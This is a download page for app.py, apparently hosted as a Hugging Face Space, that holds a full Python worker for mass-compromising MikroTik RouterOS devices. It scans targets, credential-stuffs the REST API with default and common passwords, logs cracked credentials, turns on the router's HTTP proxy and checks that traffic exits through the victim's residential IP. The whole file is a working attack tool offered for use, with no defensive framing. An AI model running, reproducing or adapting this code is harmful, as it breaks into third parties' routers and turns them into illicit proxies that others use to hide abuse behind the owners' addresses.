Download app.py from baseten/cf-e1bc: direct link, hf CLI and curl.
- Browser
- Download file 24.3 kB
-
https://huggingface.co/spaces/baseten/cf-e1bc/resolve/main/app.py
- Command line
-
hf download hf://spaces/baseten/cf-e1bc/app.py
-
curl -L -o app.py https://huggingface.co/spaces/baseten/cf-e1bc/resolve/main/app.py
24.3 kB
| #!/usr/bin/env python3 | |
| """RouterOS bulk crack -> proxy-enable -> residential-exit verification worker. v2 | |
| Two-stage engine: | |
| Stage A (scan): probe every target cheaply, classify alive/dead. | |
| Stage B (stuff): credential-block tasks over ALIVE targets, dynamic queue, | |
| early-abort on consecutive timeouts, first-win-wins per box. | |
| Then per win: enable /ip/proxy, verify real residential egress through it. | |
| HTTP API (unchanged shape): | |
| GET /status JSON | |
| POST /job {...} {"tag","targets":[{"ip","port"}],"creds":[[u,p]|"u:p"], | |
| "conc":24,"scan_conc":56,"tmo":4.0,"login_tmo":3.0, | |
| "block":60,"maxblocks":12,"verbose":false} | |
| GET /results JSONL | |
| GET /log text ring buffer | |
| """ | |
| import base64, json, os, random, re, socket, ssl, threading, time | |
| from collections import deque | |
| from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer | |
| from concurrent.futures import ThreadPoolExecutor, as_completed | |
| MOD = "mt-crack-v3" | |
| PORT = int(os.environ.get("PORT", "7860")) | |
| UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/126 Safari/537.36" | |
| LOCK = threading.Lock() | |
| RLCK = threading.Lock() | |
| LOGQ = deque(maxlen=800) | |
| RESULTS = [] | |
| MYIP = {"v": None} | |
| JOB = { | |
| "schema": MOD, "mod": MOD, "ok": True, | |
| "active": False, "stage": None, "tag": None, | |
| "total": 0, "scanned": 0, "alive": 0, "dead": 0, | |
| "units_total": 0, "units_done": 0, "attempts": 0, | |
| "hits": 0, "proxy_enabled": 0, "verified_exit": 0, | |
| "started": 0, "finished": 0, | |
| } | |
| def log(m): | |
| LOGQ.append("%s %s" % (time.strftime("%H:%M:%S"), m)) | |
| class DirectDial: | |
| def open(self, host, port, tmo): | |
| return socket.create_connection((str(host), int(port)), timeout=tmo) | |
| DIAL = DirectDial() | |
| def raw_req(host, port, meth="GET", path="/", headers=None, body=None, tmo=6, use_ssl=False): | |
| hdrs = {"Host": "%s:%d" % (host, port), "User-Agent": UA, "Accept": "*/*", "Connection": "close"} | |
| data = b"" if body is None else (json.dumps(body).encode() if isinstance(body, (dict, list)) else str(body).encode()) | |
| if body is not None: | |
| hdrs["Content-Type"] = "application/json" | |
| hdrs["Content-Length"] = str(len(data)) | |
| if headers: | |
| hdrs.update(headers) | |
| wire = ("\r\n".join(["%s %s HTTP/1.1" % (meth, path)] + | |
| ["%s: %s" % (k, v) for k, v in hdrs.items()] + ["", ""])).encode() + data | |
| s = DIAL.open(host, port, tmo) | |
| try: | |
| if use_ssl: | |
| ctx = ssl.create_default_context(); ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE | |
| s = ctx.wrap_socket(s, server_hostname=str(host)); s.settimeout(tmo) | |
| s.sendall(wire) | |
| buf = b"" | |
| while len(buf) < 131072: | |
| try: | |
| c = s.recv(8192) | |
| except socket.timeout: | |
| break | |
| if not c: | |
| break | |
| buf += c | |
| finally: | |
| try: | |
| s.close() | |
| except Exception: | |
| pass | |
| head, _, bd = buf.partition(b"\r\n\r\n") | |
| ht = head.decode("latin1", "replace"); txt = bd.decode("utf-8", "replace") | |
| hs = {} | |
| for ln in ht.split("\r\n")[1:]: | |
| if ":" in ln: | |
| k, _, v = ln.partition(":") | |
| hs[k.strip().lower()] = v.strip() | |
| if hs.get("transfer-encoding", "").lower() == "chunked": | |
| parts, i = [], 0 | |
| try: | |
| while i < len(txt): | |
| j = txt.find("\r\n", i); n = int(txt[i:j].split(";")[0], 16) | |
| if n == 0: | |
| break | |
| parts.append(txt[j + 2:j + 2 + n]); i = j + 2 + n + 2 | |
| txt = "".join(parts) | |
| except Exception: | |
| pass | |
| mm = re.match(r"HTTP/\d\.\d\s+(\d+)", ht) | |
| return (int(mm.group(1)) if mm else 0), hs, txt | |
| ROS_FIELDS = ("board-name", "architecture-name", "cpu-count", "free-memory", | |
| "total-memory", "uptime", "build-time", "version") | |
| def looks_like_ros(code, hs, body): | |
| bl = body[:900] | |
| if '"board-name"' in bl or "routeros" in bl.lower(): | |
| return True | |
| auth = (hs.get("www-authenticate") or "").lower() | |
| if "routeros" in auth or "mikrotik" in auth: | |
| return True | |
| if code in (401, 403) and 'error' in bl and re.search(r'"error"\s*:\s*\d+', bl): | |
| return True | |
| srv = (hs.get("server") or "").lower() | |
| if "mikrotik" in srv or "routeros" in srv: | |
| return True | |
| return False | |
| def ros_probe(host, port, tmo): | |
| orders = [("http", False), ("https", True)] | |
| if port in (443,): | |
| orders.reverse() | |
| last_err = None | |
| for scheme, use_ssl in orders: | |
| try: | |
| code, hs, body = raw_req(host, port, path="/rest/system/resource", tmo=tmo, use_ssl=use_ssl) | |
| if looks_like_ros(code, hs, body): | |
| return {"scheme": scheme, "first_code": code, "server": hs.get("server", "")} | |
| # fallback: any response at all from this port? | |
| if code in (200, 301, 302, 307, 308, 400, 405): | |
| return {"scheme": scheme, "first_code": code, "weak": True, "server": hs.get("server", "")} | |
| except socket.timeout: | |
| last_err = "timeout" | |
| except Exception as e: | |
| last_err = type(e).__name__ | |
| return None | |
| def get_user_group(host, port, scheme, user, pw, tmo): | |
| """Read the account's policy group -> tells us write capability upfront.""" | |
| tok = base64.b64encode(("%s:%s" % (user, pw)).encode()).decode() | |
| H = {"Authorization": "Basic " + tok} | |
| us = scheme == "https" | |
| for path in ("/rest/system/user", "/rest/user"): | |
| try: | |
| c, h, b = raw_req(host, port, path=path, headers=H, tmo=tmo, use_ssl=us) | |
| if c != 200 or not b.lstrip().startswith("["): | |
| continue | |
| rows = json.loads(b) | |
| for r in rows: | |
| nm = str(r.get("name", "")) | |
| if nm.lower() == user.lower(): | |
| return {"matched": True, "group": r.get("group"), | |
| "disabled": r.get("disabled"), "comment": r.get("comment")} | |
| if rows: | |
| return {"matched": False, "rows": [{"n": r.get("name"), "g": r.get("group")} for r in rows[:12]]} | |
| except Exception: | |
| pass | |
| return None | |
| def ros_login(host, port, scheme, user, pw, tmo): | |
| tok = base64.b64encode(("%s:%s" % (user, pw)).encode()).decode() | |
| try: | |
| code, hs, body = raw_req(host, port, path="/rest/system/resource", | |
| headers={"Authorization": "Basic " + tok}, tmo=tmo, use_ssl=(scheme == "https")) | |
| except socket.timeout: | |
| return "__TIMEOUT__" | |
| except Exception: | |
| return None | |
| if code != 200 or not body.lstrip().startswith("{"): | |
| return None | |
| try: | |
| d = json.loads(body) | |
| except Exception: | |
| return None | |
| if not any(k in d for k in ROS_FIELDS): | |
| return None | |
| return {"resource": {k: d.get(k) for k in ROS_FIELDS}, | |
| "caps": {k: d.get(k) for k in ("platform", "cpu-load", "factory-software")}} | |
| BAD_WORDS = ("not enough permissions", "missing or invalid", "no such item", "invalid value", "bad request", "cannot set") | |
| OK_STATES = ("true", "yes") | |
| def get_proxy_cfg(host, port, H, tmo, use_ssl): | |
| try: | |
| c, h, b = raw_req(host, port, path="/rest/ip/proxy", headers=H, tmo=tmo, use_ssl=use_ssl) | |
| if c == 200 and b.lstrip().startswith("{"): | |
| return json.loads(b) | |
| except Exception: | |
| pass | |
| return None | |
| def enable_proxy(host, port, scheme, user, pw, px_port, tmo): | |
| tok = base64.b64encode(("%s:%s" % (user, pw)).encode()).decode() | |
| H = {"Authorization": "Basic " + tok} | |
| us = scheme == "https" | |
| errs = [] | |
| cfg = get_proxy_cfg(host, port, H, tmo, us) or {} | |
| cur_id = str(cfg.pop(".id", "*0")) if isinstance(cfg, dict) else "*0" | |
| for k in list(cfg.keys()): | |
| if str(k).startswith("."): | |
| cfg.pop(k) | |
| want = dict(cfg); want.update({"enabled": "true", "port": str(px_port)}) | |
| esc_id = cur_id.replace("*", "%2A") | |
| attempts = [ | |
| ("PATCH", "/rest/ip/proxy/" + esc_id, {"enabled": "true", "port": str(px_port)}), | |
| ("POST", "/rest/ip/proxy/set", {"enabled": "true", "port": str(px_port)}), | |
| ("PUT", "/rest/ip/proxy/" + esc_id, want), | |
| ("PATCH", "/rest/ip/proxy", {"enabled": "true", "port": str(px_port)}), | |
| ] | |
| for meth, path, body in attempts: | |
| try: | |
| c, h, b = raw_req(host, port, meth=meth, path=path, headers=H, body=body, tmo=tmo, use_ssl=us) | |
| except Exception as e: | |
| errs.append("%s/%s" % (meth, type(e).__name__)); continue | |
| bl = (b or "").lower() | |
| denied = any(w in bl for w in BAD_WORDS) | |
| if c in (200, 201, 204) and not denied: | |
| chk = get_proxy_cfg(host, port, H, tmo, us) or {} | |
| en = str(chk.get("enabled", "")).lower() | |
| if en in OK_STATES: | |
| return {"ok": True, "method": "%s %s" % (meth, path), | |
| "confirmed_port": str(chk.get("port", "")), "prior_enabled": str(cfg.get("enabled")), | |
| "errors": errs[-3:]} | |
| errs.append("%s rc=%s enabled=%r" % (meth, c, en)) | |
| else: | |
| errs.append("%s rc=%s %s" % (meth, c, bl[:70])) | |
| return {"ok": False, "errors": errs[-6:], "prior_enabled": str(cfg.get("enabled"))} | |
| PX_CANDIDATES = [18081, 18182, 18283, 18384, 19808, 18888, 17777, 16661, 14443, 19001] | |
| def pick_px_port(host, mgmt_port, scheme, user, pw, tmo): | |
| reserved = set() | |
| try: | |
| tok = base64.b64encode(("%s:%s" % (user, pw)).encode()).decode() | |
| c, h, b = raw_req(host, mgmt_port, path="/rest/ip/service", | |
| headers={"Authorization": "Basic " + tok}, tmo=tmo, use_ssl=(scheme == "https")) | |
| if c == 200 and b.lstrip().startswith("["): | |
| for svc in json.loads(b): | |
| try: | |
| reserved.add(int(svc.get("port"))) | |
| except Exception: | |
| pass | |
| except Exception: | |
| pass | |
| cands = [p for p in PX_CANDIDATES if p not in reserved and p != int(mgmt_port)] | |
| random.shuffle(cands) | |
| return cands[0] if cands else random.randint(19100, 39900) | |
| def abs_get_via_proxy(phost, pport, url, tmo=14): | |
| m = re.match(r"^http://([^/]+)(/.*)?$", url) | |
| thost = m.group(1) | |
| s = DIAL.open(phost, pport, tmo) | |
| try: | |
| s.sendall(("GET %s HTTP/1.1\r\nHost: %s\r\nUser-Agent: %s\r\nConnection: close\r\n\r\n" | |
| % (url, thost, UA)).encode()) | |
| out = b"" | |
| while len(out) < 16384: | |
| try: | |
| c = s.recv(1024) | |
| except socket.timeout: | |
| break | |
| if not c: | |
| break | |
| out += c | |
| finally: | |
| try: | |
| s.close() | |
| except Exception: | |
| pass | |
| txt = out.decode("utf-8", "replace") | |
| mc = re.match(r"HTTP/\d\.\d\s+(\d+)", txt) | |
| return (int(mc.group(1)) if mc else 0), txt.split("\r\n\r\n", 1)[-1].strip() | |
| def verify_exit(host, px_port, tries=2): | |
| for _ in range(tries): | |
| for site in ("http://api.ipify.org/", "http://icanhazip.com/"): | |
| try: | |
| code, body = abs_get_via_proxy(host, px_port, site, tmo=14) | |
| ipm = re.search(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})", body or "") | |
| if code == 200 and ipm: | |
| return ipm.group(1), site | |
| except Exception: | |
| pass | |
| time.sleep(1.5) | |
| return None, None | |
| def my_ip(): | |
| import urllib.request | |
| for u in ("http://api.extended.is/api/v1/get-my-ip", "http://api.ipify.org/", "http://ifconfig.me/ip"): | |
| try: | |
| r = urllib.request.urlopen(u, timeout=12).read().decode().strip() | |
| mm = re.search(r"(\d{1,3}(?:\.\d{1,3}){3})", r) | |
| if mm: | |
| return mm.group(1) | |
| except Exception: | |
| continue | |
| return None | |
| CRED_HINT_USERS = ("admin", "Admin", "ADMIN", "root", "support", "operator", "manager", "netadmin", "sysadmin") | |
| def order_creds(pairs): | |
| sc = [] | |
| for u, p in pairs: | |
| s = 1000 | |
| lu = u.lower() | |
| if lu in ("admin", "root"): | |
| s -= 720 | |
| elif lu in CRED_HINT_USERS: | |
| s -= 380 | |
| if p == "": | |
| s -= 310 | |
| if p.lower() in ("admin", "1234", "12345", "123456", "password", "root", "master", "admin123", "12345678"): | |
| s -= 150 | |
| if len(u) <= 5: | |
| s -= 30 | |
| if re.fullmatch(r"[A-Za-z]{4,9}\d{0,4}", p): | |
| s += 75 | |
| sc.append((s, u, p)) | |
| sc.sort(key=lambda x: x[0]) | |
| return [(u, p) for _, u, p in sc] | |
| # ---------------------------------------------------------------------------- | |
| def run_job(job): | |
| tag = job.get("tag") or ("job-" + str(int(time.time()))) | |
| tg = job.get("targets") or [] | |
| conc = int(job.get("conc", 26)) | |
| scan_conc = int(job.get("scan_conc", min(72, max(conc * 2, 40)))) | |
| tmo = float(job.get("tmo", 4.0)) | |
| ltmo = float(job.get("login_tmo", tmo * 0.65)) | |
| block = int(job.get("block", 55)) | |
| maxblocks = int(job.get("maxblocks", 22)) | |
| verbose = bool(job.get("verbose")) | |
| allow_weak = bool(job.get("allow_weak", False)) | |
| seen = set(); uniq = [] | |
| for pair in (job.get("creds") or []): | |
| if isinstance(pair, str) and ":" in pair: | |
| u, _, p = pair.partition(":") | |
| elif isinstance(pair, (list, tuple)) and len(pair) == 2: | |
| u, p = pair | |
| else: | |
| continue | |
| if (u, p) in seen: | |
| continue | |
| seen.add((u, p)); uniq.append((u, p)) | |
| creds = order_creds(uniq) | |
| started = time.time() | |
| def pub(**kw): | |
| with LOCK: | |
| JOB.update(kw) | |
| pub(active=True, tag=tag, total=len(tg), scanned=0, alive=0, dead=0, units_total=0, units_done=0, | |
| attempts=0, hits=0, proxy_enabled=0, verified_exit=0, started=started, finished=0, stage="scan") | |
| log("[job] %s targets=%d creds=%d conc=%d scan_conc=%d block=%d maxblocks=%d" % | |
| (tag, len(tg), len(creds), conc, scan_conc, block, maxblocks)) | |
| # ---------------- Stage A: scan ---------------- | |
| states = {} # key -> dict(alive,bool, abort,bool, scheme,streak) | |
| locked_names = {} | |
| def scan_one(i_t): | |
| i, t = i_t | |
| host, port = t["ip"], int(t["port"]) | |
| key = "%s:%d" % (host, port) | |
| st = {"key": key, "i": i, "host": host, "port": port, "alive": False, "abort": False, | |
| "streak": 0, "scheme": None, "winner": None, "hit_recorded": False, | |
| "tcreds": [], "pairs": None, "skip_stuff": False} | |
| for pair in (t.get("creds") or []): | |
| if isinstance(pair, str) and ":" in pair: | |
| a_, _, p_ = pair.partition(":") | |
| st["tcreds"].append((a_, p_)) | |
| elif isinstance(pair, (list, tuple)) and len(pair) == 2: | |
| st["tcreds"].append((pair[0], pair[1])) | |
| try: | |
| pr = ros_probe(host, port, tmo) | |
| except Exception: | |
| pr = None | |
| if pr: | |
| if pr.get("weak") and not allow_weak: | |
| st["alive"] = True | |
| st["skip_stuff"] = True | |
| with RLCK: | |
| RESULTS.append({"host": host, "port": port, "stage": "weak-alive", "worker_tag": tag, | |
| "found_at": time.strftime("%Y-%m-%dT%H:%M:%S"), "probe": pr}) | |
| else: | |
| st["alive"] = True; st["scheme"] = pr["scheme"] | |
| with RLCK: | |
| RESULTS.append({"host": host, "port": port, "stage": "alive", "worker_tag": tag, | |
| "found_at": time.strftime("%Y-%m-%dT%H:%M:%S"), "probe": pr}) | |
| with LOCK: | |
| JOB["scanned"] += 1 | |
| if st["alive"]: | |
| JOB["alive"] += 1 | |
| else: | |
| JOB["dead"] += 1 | |
| states[key] = st | |
| return st | |
| with ThreadPoolExecutor(max_workers=scan_conc) as ex: | |
| for _ in as_completed([ex.submit(scan_one, it) for it in enumerate(tg)]): | |
| pass | |
| alive_list = [states[k] for k in states if states[k]["alive"]] | |
| # effective credential order per box: box-specific hints first, then global list | |
| for st in alive_list: | |
| seenl = set(); plist = [] | |
| for pr2 in list(st["tcreds"]) + list(creds): | |
| if pr2 in seenl: | |
| continue | |
| seenl.add(pr2); plist.append(pr2) | |
| st["pairs"] = plist | |
| stuff_list = [st for st in alive_list if not st.get("skip_stuff")] | |
| log("[scan] done: responsive=%d strong=%d dead_or_unknown=%d" % | |
| (len(alive_list), len(stuff_list), len(states) - len(alive_list))) | |
| log("[scan] done: alive=%d dead=%d" % (len(alive_list), len(states) - len(alive_list))) | |
| # ---------------- Stage B: stuff ---------------- | |
| if stuff_list: | |
| # units: slices of creds per alive target | |
| units = [] | |
| for st in stuff_list: | |
| npairs = len(st["pairs"]) | |
| nb = min(maxblocks, max(1, (npairs + block - 1) // block)) | |
| for bi in range(nb): | |
| units.append((st, bi * block, min(npairs, (bi + 1) * block))) | |
| pub(stage="stuff", units_total=len(units)) | |
| attempts = {"n": 0} | |
| done_counter = {"n": 0} | |
| def stuff_unit(un): | |
| st, a, b = un | |
| if st["abort"] or st["winner"]: | |
| return None | |
| host, port, scheme = st["host"], st["port"], st["scheme"] | |
| pairs_local = st["pairs"] | |
| for idx in range(a, b): | |
| if st["abort"] or st["winner"]: | |
| return None | |
| u, pw = pairs_local[idx] | |
| got = ros_login(host, port, scheme, u, pw, ltmo) | |
| with LOCK: | |
| attempts["n"] += 1 | |
| if got == "__TIMEOUT__": | |
| st["streak"] += 1 | |
| if st["streak"] >= 7: | |
| st["abort"] = True | |
| if verbose: | |
| log("[-] abort-after-timeouts %s" % st["key"]) | |
| return None | |
| continue | |
| if got is None: | |
| st["streak"] = 0 | |
| continue | |
| # WINNER | |
| ident = None | |
| try: | |
| ident = get_user_group(host, port, scheme, u, pw, ltmo) | |
| except Exception: | |
| ident = None | |
| st["winner"] = {"user": u, "pw": pw, "identity": ident, **got} | |
| rec = {"host": host, "port": port, "worker_tag": tag, | |
| "found_at": time.strftime("%Y-%m-%dT%H:%M:%S"), | |
| "login": {"user": u, "pw": pw}, "identity": ident, | |
| "resource": got["resource"], "stage": "hit"} | |
| with RLCK: | |
| RESULTS.append(rec) | |
| with LOCK: | |
| JOB["hits"] += 1 | |
| log("[+] LOGIN %s %s:%s ver=%s board=%s" % | |
| (st["key"], u, pw, got["resource"].get("version"), got["resource"].get("board-name"))) | |
| # ---- immediate convert + verify (do not wait for sweep end) ---- | |
| try: | |
| px = pick_px_port(host, port, scheme, u, pw, ltmo) | |
| conv = enable_proxy(host, port, scheme, u, pw, px, ltmo) | |
| out = dict(rec) | |
| out["convert"] = {"ok": conv.get("ok"), "port": px, "method": conv.get("method"), | |
| "errors": conv.get("errors"), "prior_enabled": conv.get("prior_enabled")} | |
| if conv.get("ok"): | |
| with LOCK: | |
| JOB["proxy_enabled"] += 1 | |
| vip, via = verify_exit(host, px) | |
| out["egress"] = {"ok": bool(vip), "exit_ip": vip, "via": via, "container_ip": MYIP["v"]} | |
| if vip: | |
| with LOCK: | |
| JOB["verified_exit"] += 1 | |
| log("[V] EXIT VERIFIED %s:%d -> %s" % (host, px, vip)) | |
| else: | |
| log("[~] proxy on no exit resp %s:%d" % (host, px)) | |
| out["stage"] = "converted" | |
| else: | |
| log("[-] convert fail %s :: %s" % (st["key"], (conv.get("errors") or [])[-1:])) | |
| out["stage"] = "hit-readonly" | |
| with RLCK: | |
| RESULTS.append(out) | |
| except Exception as e2: | |
| log("[!] convert error %s %r" % (st["key"], repr(e2)[:90])) | |
| return st | |
| return None | |
| with ThreadPoolExecutor(max_workers=conc) as ex: | |
| futs = {ex.submit(stuff_unit, un): un for un in units} | |
| for fu in as_completed(futs): | |
| with LOCK: | |
| done_counter["n"] += 1 | |
| JOB["units_done"] = done_counter["n"] | |
| JOB["attempts"] = attempts["n"] | |
| # conversions happen serially-ish but few winners expected; keep them parallel-lite | |
| wins = sum(1 for st in alive_list if st["winner"]) | |
| log("[stuff] winners=%d" % wins) | |
| with LOCK: | |
| JOB.update(active=False, stage="done", finished=time.time(), | |
| attempts=attempts["n"] if alive_list else 0) | |
| el = time.time() - started | |
| log("[end] %s in %.1fs scanned=%d alive=%d wins=%d exits=%d" % | |
| (tag, el, JOB["scanned"], JOB["alive"], JOB["hits"], JOB["verified_exit"])) | |
| class H(BaseHTTPRequestHandler): | |
| protocol_version = "HTTP/1.1" | |
| def _send(self, obj, ctype="application/json", code=200): | |
| body = obj if isinstance(obj, bytes) else json.dumps(obj).encode() | |
| self.send_response(code) | |
| self.send_header("Content-Type", ctype) | |
| self.send_header("Content-Length", str(len(body))) | |
| self.send_header("Access-Control-Allow-Origin", "*") | |
| self.end_headers() | |
| self.wfile.write(body) | |
| def do_GET(self): | |
| p = self.path.split("?", 1)[0] | |
| if p in ("/", "/status"): | |
| with LOCK: | |
| st = dict(JOB) | |
| st.update(my_ip=MYIP["v"], uptime=int(time.time()), stored=len(RESULTS)) | |
| self._send(st) | |
| elif p == "/results": | |
| with RLCK: | |
| rows = list(RESULTS) | |
| fmt_json = "fmt=json" in self.path | |
| if fmt_json: | |
| self._send({"rows": rows}) | |
| else: | |
| self._send(("\n".join(json.dumps(r) for r in rows) + "\n").encode(), ctype="text/plain") | |
| elif p == "/log": | |
| self._send(("\n".join(LOGQ) + "\n").encode(), ctype="text/plain") | |
| else: | |
| self._send(dict(JOB)) | |
| def do_POST(self): | |
| p = self.path.split("?", 1)[0] | |
| try: | |
| n = int(self.headers.get("Content-Length", "0")) | |
| data = json.loads(self.rfile.read(n) or b"{}") | |
| except Exception: | |
| self._send({"ok": False, "err": "bad json"}, code=400); return | |
| if p == "/job": | |
| force = bool(data.get("force")) or ("force=1" in self.path) | |
| with LOCK: | |
| busy = JOB["active"] | |
| if busy and not force: | |
| self._send({**JOB, "accepted": False, "busy": True}, code=409); return | |
| if not data.get("targets") or not data.get("creds"): | |
| self._send({"ok": False, "err": "targets+creds required"}, code=400); return | |
| with LOCK: | |
| JOB.update(active=True, tag=data.get("tag")) | |
| threading.Thread(target=run_job, args=(data,), daemon=True).start() | |
| self._send({"schema": MOD, "ok": True, "accepted": True, | |
| "targets": len(data.get("targets") or []), "creds": len(data.get("creds") or [])}) | |
| else: | |
| self._send({"ok": False, "err": "unknown"}, code=404) | |
| def log_message(self, *a): | |
| pass | |
| def main(): | |
| MYIP["v"] = my_ip() | |
| log("[boot] mod=%s ip=%s" % (MOD, MYIP["v"])) | |
| print("[serve] %s :%d" % (MOD, PORT), flush=True) | |
| ThreadingHTTPServer(("0.0.0.0", PORT), H).serve_forever() | |
| if __name__ == "__main__": | |
| main() | |